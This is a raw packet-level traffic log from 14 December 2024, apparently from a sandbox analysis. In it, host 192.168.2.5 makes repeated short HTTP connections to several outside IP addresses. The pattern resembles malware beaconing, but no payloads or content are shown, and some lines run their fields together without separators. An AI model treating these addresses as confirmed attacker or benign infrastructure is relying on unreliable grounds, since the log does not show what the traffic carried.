                                                                                Dec 14, 2024 13:51:08.843401909 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:08.861866951 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:08.984258890 CET8049974209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:08.984275103 CET8049974209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:10.137029886 CET8049974209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:10.137100935 CET8049974209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:10.137286901 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:10.375107050 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:11.394809008 CET4998180192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:11.514760017 CET8049981209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:11.514853001 CET4998180192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:11.525719881 CET4998180192.168.2.5209.74.77.107
Timestamp                           | Source Port | Dest Port | Source IP       | Dest IP
Dec 14, 2024 13:51:11.647540092 CET | 80          | 49981     | 209.74.77.107   | 192.168.2.5
Dec 14, 2024 13:51:12.742244959 CET | 80          | 49981     | 209.74.77.107   | 192.168.2.5
Dec 14, 2024 13:51:12.742494106 CET | 80          | 49981     | 209.74.77.107   | 192.168.2.5
Dec 14, 2024 13:51:12.742743015 CET | 49981       | 80        | 192.168.2.5     | 209.74.77.107
Dec 14, 2024 13:51:12.745857954 CET | 49981       | 80        | 192.168.2.5     | 209.74.77.107
Dec 14, 2024 13:51:12.865914106 CET | 80          | 49981     | 209.74.77.107   | 192.168.2.5
Dec 14, 2024 13:51:18.412401915 CET | 49998       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:18.532728910 CET | 80          | 49998     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:18.532845020 CET | 49998       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:18.548563004 CET | 49998       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:18.669704914 CET | 80          | 49998     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:19.635170937 CET | 80          | 49998     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:19.636545897 CET | 49998       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:20.062704086 CET | 49998       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:20.183084965 CET | 80          | 49998     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:21.081398010 CET | 50004       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:21.201749086 CET | 80          | 50004     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:21.205925941 CET | 50004       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:21.220568895 CET | 50004       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:21.346208096 CET | 80          | 50004     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:22.304811954 CET | 80          | 50004     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:22.304891109 CET | 50004       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:22.738231897 CET | 50004       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:22.858495951 CET | 80          | 50004     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:23.756114006 CET | 50012       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:23.877760887 CET | 80          | 50012     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:23.877863884 CET | 50012       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:23.895442963 CET | 50012       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:24.015448093 CET | 80          | 50012     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:24.015486956 CET | 80          | 50012     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:24.977843046 CET | 80          | 50012     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:24.980710983 CET | 50012       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:25.409713984 CET | 50012       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:25.529709101 CET | 80          | 50012     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:26.425540924 CET | 50020       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:26.545452118 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:26.545557022 CET | 50020       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:26.562583923 CET | 50020       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:26.683387041 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644532919 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644563913 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644582033 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644674063 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644689083 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644705057 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644721985 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644738913 CET | 50020       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:27.644813061 CET | 50020       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:27.644824028 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644840956 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644857883 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:27.644917965 CET | 50020       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:27.644957066 CET | 50020       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:27.649336100 CET | 50020       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:51:27.769217014 CET | 80          | 50020     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:51:33.927602053 CET | 50028       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:34.048053980 CET | 80          | 50028     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:34.048160076 CET | 50028       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:34.131190062 CET | 50028       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:34.251207113 CET | 80          | 50028     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:35.606471062 CET | 80          | 50028     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:35.606570005 CET | 80          | 50028     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:35.606703043 CET | 50028       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:35.640829086 CET | 50028       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:36.678369045 CET | 50029       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:36.799120903 CET | 80          | 50029     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:36.799242973 CET | 50029       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:36.890749931 CET | 50029       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:37.010641098 CET | 80          | 50029     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:38.352535963 CET | 80          | 50029     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:38.352580070 CET | 80          | 50029     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:38.352647066 CET | 50029       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:38.406519890 CET | 50029       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:39.429358959 CET | 50030       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:39.549401045 CET | 80          | 50030     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:39.552822113 CET | 50030       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:39.569766045 CET | 50030       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:39.689842939 CET | 80          | 50030     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:39.689862967 CET | 80          | 50030     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:41.083079100 CET | 50030       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:41.123873949 CET | 80          | 50030     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:41.124053955 CET | 80          | 50030     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:41.124092102 CET | 50030       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:41.125864983 CET | 50030       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:41.206631899 CET | 80          | 50030     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:41.206767082 CET | 50030       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:42.114078045 CET | 50031       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:42.233985901 CET | 80          | 50031     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:42.234070063 CET | 50031       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:42.245107889 CET | 50031       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:42.365005970 CET | 80          | 50031     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:44.674135923 CET | 80          | 50031     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:44.674261093 CET | 80          | 50031     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:44.674370050 CET | 50031       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:44.677207947 CET | 50031       | 80        | 192.168.2.5     | 154.208.202.225
Dec 14, 2024 13:51:44.797693014 CET | 80          | 50031     | 154.208.202.225 | 192.168.2.5
Dec 14, 2024 13:51:50.331562042 CET | 50032       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:50.451354027 CET | 80          | 50032     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:50.451499939 CET | 50032       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:50.466197014 CET | 50032       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:50.586494923 CET | 80          | 50032     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:51.687136889 CET | 80          | 50032     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:51.687191010 CET | 80          | 50032     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:51.687251091 CET | 50032       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:51.973761082 CET | 50032       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:53.009957075 CET | 50033       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:53.130213022 CET | 80          | 50033     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:53.130331993 CET | 50033       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:53.316035986 CET | 50033       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:53.436017990 CET | 80          | 50033     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:54.365017891 CET | 80          | 50033     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:54.365058899 CET | 80          | 50033     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:54.365293980 CET | 50033       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:54.829490900 CET | 50033       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:55.858445883 CET | 50034       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:55.978401899 CET | 80          | 50034     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:55.981970072 CET | 50034       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:56.000159979 CET | 50034       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:56.120301008 CET | 80          | 50034     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:56.120325089 CET | 80          | 50034     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:57.217530966 CET | 80          | 50034     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:57.217609882 CET | 80          | 50034     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:57.217665911 CET | 50034       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:57.500210047 CET | 50034       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:58.521277905 CET | 50035       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:58.641407013 CET | 80          | 50035     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:58.643979073 CET | 50035       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:58.653287888 CET | 50035       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:58.773194075 CET | 80          | 50035     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:59.883641958 CET | 80          | 50035     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:59.883687019 CET | 80          | 50035     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:51:59.883910894 CET | 50035       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:51:59.906215906 CET | 50035       | 80        | 192.168.2.5     | 77.68.64.45
Dec 14, 2024 13:52:00.027117014 CET | 80          | 50035     | 77.68.64.45     | 192.168.2.5
Dec 14, 2024 13:52:06.153935909 CET | 50038       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:06.273936033 CET | 80          | 50038     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:06.274025917 CET | 50038       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:06.290647984 CET | 50038       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:06.410499096 CET | 80          | 50038     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:07.434046984 CET | 80          | 50038     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:07.434173107 CET | 50038       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:07.797492981 CET | 50038       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:07.917608976 CET | 80          | 50038     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:08.879821062 CET | 50039       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:08.999808073 CET | 80          | 50039     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:09.003803015 CET | 50039       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:09.102816105 CET | 50039       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:09.223694086 CET | 80          | 50039     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:10.170749903 CET | 80          | 50039     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:10.170829058 CET | 50039       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:10.609472990 CET | 50039       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:10.729408979 CET | 80          | 50039     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:11.647800922 CET | 50040       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:11.768579006 CET | 80          | 50040     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:11.769782066 CET | 50040       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:11.848484039 CET | 50040       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:11.968461037 CET | 80          | 50040     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:11.968477964 CET | 80          | 50040     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:12.930874109 CET | 80          | 50040     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:12.932527065 CET | 50040       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:13.360250950 CET | 50040       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:13.480169058 CET | 80          | 50040     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:14.390959024 CET | 50041       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:14.511137009 CET | 80          | 50041     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:14.511219978 CET | 50041       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:14.525094986 CET | 50041       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:14.645087957 CET | 80          | 50041     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:15.990859032 CET | 80          | 50041     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:15.990881920 CET | 80          | 50041     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:15.990911961 CET | 80          | 50041     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:15.990923882 CET | 80          | 50041     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:15.991017103 CET | 50041       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:15.996864080 CET | 50041       | 80        | 192.168.2.5     | 208.91.197.27
Dec 14, 2024 13:52:16.120071888 CET | 80          | 50041     | 208.91.197.27   | 192.168.2.5
Dec 14, 2024 13:52:21.571973085 CET | 50042       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:21.691864967 CET | 80          | 50042     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:21.692924023 CET | 50042       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:21.707577944 CET | 50042       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:21.827395916 CET | 80          | 50042     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:22.793754101 CET | 80          | 50042     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:22.793819904 CET | 50042       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:23.226217031 CET | 50042       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:23.347759962 CET | 80          | 50042     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:24.238238096 CET | 50043       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:24.358184099 CET | 80          | 50043     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:24.358299971 CET | 50043       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:24.374974966 CET | 50043       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:24.495177984 CET | 80          | 50043     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:25.457454920 CET | 80          | 50043     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:25.457591057 CET | 50043       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:25.893701077 CET | 50043       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:26.013636112 CET | 80          | 50043     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:26.910151005 CET | 50044       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:27.031445980 CET | 80          | 50044     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:27.032990932 CET | 50044       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:27.053821087 CET | 50044       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:27.174104929 CET | 80          | 50044     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:27.174262047 CET | 80          | 50044     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:28.132708073 CET | 80          | 50044     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:28.132802963 CET | 50044       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:28.571211100 CET | 50044       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:28.693712950 CET | 80          | 50044     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:29.581796885 CET | 50045       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:29.702440023 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:29.703347921 CET | 50045       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:29.711357117 CET | 50045       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:29.831481934 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.801634073 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.801707983 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.801719904 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.801841021 CET | 50045       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:30.801845074 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.801858902 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.801868916 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.801903963 CET | 50045       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:30.801920891 CET | 50045       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:30.802011013 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.802022934 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.802056074 CET | 50045       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:30.802196980 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.802977085 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:30.803026915 CET | 50045       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:30.806361914 CET | 50045       | 80        | 192.168.2.5     | 84.32.84.32
Dec 14, 2024 13:52:30.927823067 CET | 80          | 50045     | 84.32.84.32     | 192.168.2.5
Dec 14, 2024 13:52:36.157856941 CET | 50046       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:36.277847052 CET | 80          | 50046     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:36.285832882 CET | 50046       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:36.297832966 CET | 50046       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:36.420831919 CET | 80          | 50046     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:37.562068939 CET | 80          | 50046     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:37.562100887 CET | 80          | 50046     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:37.562249899 CET | 50046       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:37.562588930 CET | 80          | 50046     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:37.562640905 CET | 50046       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:37.797219038 CET | 50046       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:38.824812889 CET | 50047       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:38.944919109 CET | 80          | 50047     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:38.947334051 CET | 50047       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:38.965279102 CET | 50047       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:39.085258007 CET | 80          | 50047     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:40.212050915 CET | 80          | 50047     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:40.212095022 CET | 80          | 50047     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:40.212158918 CET | 80          | 50047     | 104.21.77.71    | 192.168.2.5
Dec 14, 2024 13:52:40.212187052 CET | 50047       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:40.212229967 CET | 50047       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:40.469404936 CET | 50047       | 80        | 192.168.2.5     | 104.21.77.71
Dec 14, 2024 13:52:41.488559008 CET | 50048       | 80        | 192.168.2.5     | 104.21.77.71
                                                                                Dec 14, 2024 13:52:41.608597994 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:41.608697891 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:41.626995087 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:41.747020960 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:41.747037888 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:42.888066053 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:42.888129950 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:42.888425112 CET8050048104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:42.888647079 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:42.888647079 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:43.140744925 CET5004880192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:44.159674883 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:44.280035973 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:44.280427933 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:44.289949894 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:44.409967899 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:45.556891918 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:45.556916952 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:45.557053089 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:45.557363033 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:45.557403088 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:45.560637951 CET5004980192.168.2.5104.21.77.71
                                                                                Dec 14, 2024 13:52:45.682508945 CET8050049104.21.77.71192.168.2.5
                                                                                Dec 14, 2024 13:52:50.896378994 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:51.016529083 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:51.016639948 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:51.031285048 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:51.151436090 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:52.335288048 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:52.335350037 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:52.336502075 CET8050050172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:52.336544991 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:52.340511084 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:52.549969912 CET5005080192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:53.566618919 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:53.686636925 CET8050051172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:53.686769962 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:53.718107939 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:53.839188099 CET8050051172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:55.020826101 CET8050051172.67.220.36192.168.2.5
